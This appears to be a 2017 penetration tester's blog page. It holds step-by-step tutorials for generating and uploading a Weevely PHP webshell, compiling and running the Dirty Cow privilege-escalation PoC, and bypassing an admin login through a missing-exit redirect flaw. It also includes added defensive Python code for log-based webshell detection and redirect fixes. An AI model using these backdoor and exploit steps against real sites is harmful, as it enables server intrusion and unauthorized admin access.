
About me

Let me introduce myself


A bit about me

Ifrah Iman is a Penetration Tester & Web Application Security Researcher from Pakistan.

Profile

Ifrah Iman

- Web App Security Researcher & Penetration Tester
- Programmer & Coder


Blog Posts



Tuesday, 23 May 2017

Ransomwares

Now don't say that you haven't heard the name "Ransomware". These days ransomware attacks are trending, and everyone is getting hit by this strange piece of malware called ransomware.



WHAT IS RANSOMWARE ?

Ransomware is malware which encrypts or locks all of your data and then demands a ransom (a money payment) in exchange for the decryption key that gets your data back.

Sounds scary! Well, it is scary. Ransomware infections are very difficult to clean up. Also, according to one research report, 88% of the computers infected with ransomware paid the ransom but never received the decryption key.

So you'll be thinking: as a normal person, why would you pay $$$ to get your data back? You can format everything and reinstall from scratch. But this is not possible for everyone.
Ransomware usually attacks offices, hospitals, schools, banks and government establishments, and their data is very important to them, because it contains all of their records, reports, even financial credentials, etc. That's why ransomware usually targets business organizations, where the data matters most. That's how they earn!

HOW ARE RANSOMWARES MADE ?

Now, if you look up how to download ransomware on the internet, you'll get a lot of links telling you to buy it. But believe it, ransomware can easily be coded. You just have to create a program which encrypts the user's data and asks for payment for the decryption key. Furthermore, authors can add an exploit to take advantage of a vulnerability for initial access.

HOW TO PROTECT YOURSELVES FROM RANSOMWARES ?

To protect yourselves from ransomware, follow these steps:
- Upgrade your current operating system to the latest version and keep it updated.
- Use an updated antivirus program and an anti-spyware program.
- Don't download any file from an untrusted source.
- Close your open ports.

If you liked the article, please share it ;_; it will save someone's life.

Monday, 24 April 2017

Weevely Backdoor - Remote Code Execution

Today in this article I'll show you how you can back-connect to a web server through weevely without any port forwarding.



Weevely is a tool which creates a backdoor in PHP. That file can then be uploaded to a website as a shell. Afterwards, from the terminal, we can access the server by connecting to that shell with its URL and password.

Steps:

1- First create a backdoor with weevely:

weevely generate password location/shell.php


The command above is the usage for creating a backdoor. Replace password with any password you like, and location with the directory where you want the file generated, followed by the name of the shell with the .php extension. For example:

weevely generate pass123 /root/Desktop/backdoor.php



2- Now go to the website and upload the shell there.
Next we need to back-connect to it to get access to the server via the CLI. For that, type this command:

weevely link-of-backdoor password

Here you need to enter the link of the backdoor which you uploaded, and enter its password as well, e.g:

weevely http://site.com/backdoor.php pass123


3- Finally, we have got access to the server. Try entering a command, e.g. whoami, id or uname -a, to find out details about that server for further exploitation.


Thanks for reading, please share.
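From the defender's side, the upload-and-connect workflow described above leaves a clear trace in the web server's access log: requests, usually POSTs, to a script sitting in a directory that should only ever hold static uploads. The following Python example is added here and is not part of the original post or of weevely itself; the log lines, the client addresses, the path `/uploads/backdoor.php` and the list of upload directories are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Apr/2017:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Apr/2017:10:01:09 +0000] "POST /upload.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Apr/2017:10:01:15 +0000] "POST /uploads/backdoor.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Apr/2017:10:01:16 +0000] "POST /uploads/backdoor.php?v=2 HTTP/1.1" 200 944 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Apr/2017:10:01:40 +0000] "GET /images/photo.jpg.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Apr/2017:10:02:30 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# client, identd, user, [timestamp], "METHOD path protocol", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions a PHP handler would execute, and directories that should only serve static files.
# Both lists are assumptions for this example; adapt them to the real server configuration.
SCRIPT_EXTENSIONS = (".php", ".php5", ".phtml", ".phar")
UPLOAD_DIRS = ("/uploads/", "/images/", "/files/")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop any query string so "backdoor.php?v=2" is still recognised as backdoor.php.
    rec["path"] = urlsplit(rec["path"]).path
    return rec


def is_script_in_upload_dir(path):
    """True when a server-side script is requested from an upload-only directory.
    Matching on the suffix also catches double extensions such as photo.jpg.php."""
    lower = path.lower()
    return lower.startswith(UPLOAD_DIRS) and lower.endswith(SCRIPT_EXTENSIONS)


def find_suspicious(log_text):
    """All parsed records whose path is a script inside an upload directory."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_script_in_upload_dir(rec["path"]):
            hits.append(rec)
    return hits


def summarize(hits):
    """Group hits by (client, path): one backdoor contacted fifty times is one finding."""
    counts = {}
    for h in hits:
        key = (h["ip"], h["path"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for (ip, path), n in summarize(find_suspicious(SAMPLE_LOG)).items():
        print(f"{ip} -> {path}: {n} request(s) to a script inside an upload directory")
```

A hit from this scan is only a starting point: the next step is to confirm that the file should not exist and pull it, then check the upload handler that allowed a `.php` name through. The structural fix is to stop the interpreter from ever running anything under the upload directories (with mod_php, `php_admin_flag engine off` in that directory's configuration, or an equivalent deny rule on the web server), so an uploaded script is served as inert text rather than executed.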

Sunday, 16 April 2017

OWASP TOP 10 - 2017

OWASP released the top 10 web application vulnerabilities for the year 2017 a few days ago.

[Image: OWASP Top Ten]

Following are the top 10 vulnerabilities which make the web applications at a risk in the year 2017:

[Image: OWASP Top 10 2017]

The previous OWASP Top 10 was released in 2013, and if you compare the two there isn't very much difference:

[Image: OWASP Top 10 2017 compared with 2013]

Injection is still at the top, and Authentication Flaws second. What I am shocked about is that Cross-Site Scripting is at third, where it shouldn't be.

Only A4, A7 & A10 have changed; all the rest are the same.

You can download the PDF from here.

Friday, 7 April 2017

Dirty Cow POC ( Privilege Escalation Exploit )

Dirty Cow is a very famous open-source privilege escalation exploit released back in November 2016. The exploit was used a lot by hackers, mostly on web servers, to gain local root access in the shell.



Today I’ll show you the demonstration of this exploit.

So go to https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs and you'll see a lot of PoCs there. I'll be using the dirty.c PoC for the exploit, and I'll clone it onto my machine.

Steps:

1- By default the PoC uses a fixed username, so we need to change it. Open the PoC in an editor and you'll see something like this:

user.username = "firefart";


Just edit it, replace firefart with your own name, and it will look like this:

user.username = "iman";


Save it and close. Make a new folder and move the poc there.


2- Since the PoC is in C, we'll compile it. Just type the following command in your console:

gcc -pthread dirty.c -o anyname -lcrypt

Here you can change anyname to any name you like :P


3- Now you’ll notice a new executable is created automatically in the directory. Run it:


./anyname password here

Here anyname is the name you chose while compiling the PoC, and password can be any password you'd like to use.


4- Now press Enter and you'll see it running. Open up a new terminal and you'll see the username has changed. And yes, don't forget the following command after using the exploit, to restore your original passwd file:

mv /tmp/passwd.bak /etc/passwd


This exploit does not work on all servers, so it is better to check the official site first; still, this is the best method for privilege escalation.


Thursday, 6 April 2017

Fix WiFi Interface Monitor Mode Problems

Hello, in this article I'll tell you a simple way of solving most of the monitor mode problems we get in airodump, airmon and custom scripts or tools.



So in case monitor mode is already activated but not working, it needs to be refreshed a little. Most of the problems occur when it is not refreshed, for example if you were trying to use two scripts or tools which require monitor mode at the same time. The problem usually shows up with wlan0mon.

Just take a look:

root@h3llcat: airodump-ng wlan0mon
Failed ! No device or resource busy

Any other type of error you are facing should be solved the same way.

Steps:


1- Just open up a new terminal and type in:

root@h3llcat: airmon-ng

This is just to check your current interface and its monitor mode status.

2- Now type the following:

root@h3llcat: airmon-ng stop interface_name

If you saw two different interfaces in step 1, say wlan0 and mon0, then stop both of them one by one. If you had only one, like wlan0 or wlan0mon, then do it once.

3- Now type this:

root@h3llcat: ifconfig interface_name down

Here, if you had two interfaces before, like wlan0 and mon0, then only bring down wlan0; the same applies if you had wlan0mon.


By now your problem should be solved. I ran into this problem a lot of times, so I found a solution and thought I'd share it. You can also watch the following video for a demonstration:

Tuesday, 21 March 2017

Redirection Vulnerability & Admin Panel Bypass

In this article, I will talk about the redirection vulnerability and how to exploit it.



On local sites we can exploit it to bypass the admin panel, getting straight into the admin panel without logging in with any credentials.


Steps:

First of all we'll have to find out whether the website has the redirection flaw or not. To do that, we first find the admin panel of the site.

Suppose we have got the admin panel login which is :

www.site.com/admin/index.php

Now we will try to figure out any other link inside the admin panel, such as Admin Gallery, Admin Home, Admin Dashboard or Admin Settings.

Suppose we found one which is :

www.site.com/admin/dashboard.php

Now this exploit will only work if there is a redirection between these two links. Without having logged in to the admin panel, I first visit the first link, which asks for a login, and then I change the link to the Dashboard.

I will see that whenever I go to www.site.com/admin/dashboard.php the link automatically redirects to www.site.com/admin/index.php (which is the admin login).

If the redirection occurs then the website is vulnerable. We can now try exploiting it :)



Exploitation:

OK, so now it's time to exploit it.
Install the NoRedirect add-on in your Firefox, open it, add the admin panel login link there, and click Save.

Now just visit www.site.com/admin/dashboard.php and you will see the Dashboard opens automatically, without logging in.

If you are having difficulties watch this video:
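Why the NoRedirect trick works, and what the fix looks like, as an added Python example that is not part of the original post: the flaw is a page that sends the redirect to the login form but keeps on rendering the protected content after the Location header. A browser follows the 302 and the author never sees the body, but a client that ignores redirects (the NoRedirect add-on, or curl without -L) receives the whole dashboard. Both handlers below are hypothetical models of the post's /admin/dashboard.php and /admin/index.php; the session dict, the dashboard markup and the helper names are assumptions for this example.

```python
LOGIN_URL = "/admin/index.php"  # the admin login page named in the post
# Constructed stand-in for the protected page's markup.
DASHBOARD_HTML = "<h1>Admin Dashboard</h1><a href='/admin/settings.php'>Settings</a>"


def dashboard_vulnerable(session):
    """Model of the flawed page. Returns (status, headers, body).

    The bug: the redirect is set, but execution does not stop, so the
    protected body is still generated and sent. This is the PHP pattern
    header("Location: index.php"); with no exit; after it.
    """
    status, headers = 200, {}
    if not session.get("admin"):
        status = 302
        headers["Location"] = LOGIN_URL
        # missing: return here
    body = DASHBOARD_HTML  # still runs for anonymous users
    return status, headers, body


def dashboard_fixed(session):
    """Hardened page: the authorization check decides the whole response.

    An anonymous request gets the redirect and an empty body, and the
    dashboard markup is never built. Stopping immediately is what matters;
    the redirect is only a convenience for real browsers.
    """
    if not session.get("admin"):
        return 302, {"Location": LOGIN_URL}, ""
    return 200, {}, DASHBOARD_HTML


def client_ignoring_redirects(handler, session):
    """Model of NoRedirect / curl without -L: show whatever body arrives."""
    _status, _headers, body = handler(session)
    return body


def leaks_protected_content(handler):
    """Defender-side check: does an anonymous request still receive dashboard markup?"""
    body = client_ignoring_redirects(handler, session={})
    return "Admin Dashboard" in body


def audit_response(status, body):
    """Heuristic for a manual test with `curl -i` against a real site: a 3xx
    redirect that carries a non-trivial body is worth a closer look, since a
    correct login redirect has nothing to say."""
    return 300 <= status < 400 and len(body.strip()) > 0


if __name__ == "__main__":
    for name, handler in (("vulnerable", dashboard_vulnerable), ("fixed", dashboard_fixed)):
        status, _, body = handler({})
        print(f"{name}: status={status} leaks={leaks_protected_content(handler)} "
              f"suspicious={audit_response(status, body)}")
```

The same check works against a live application without any add-on: request the protected URL with `curl -i` (which does not follow redirects by default) and look at whether the 302 response carries page content. The fix is entirely server-side: the authorization check must end the request, not merely add a header to it.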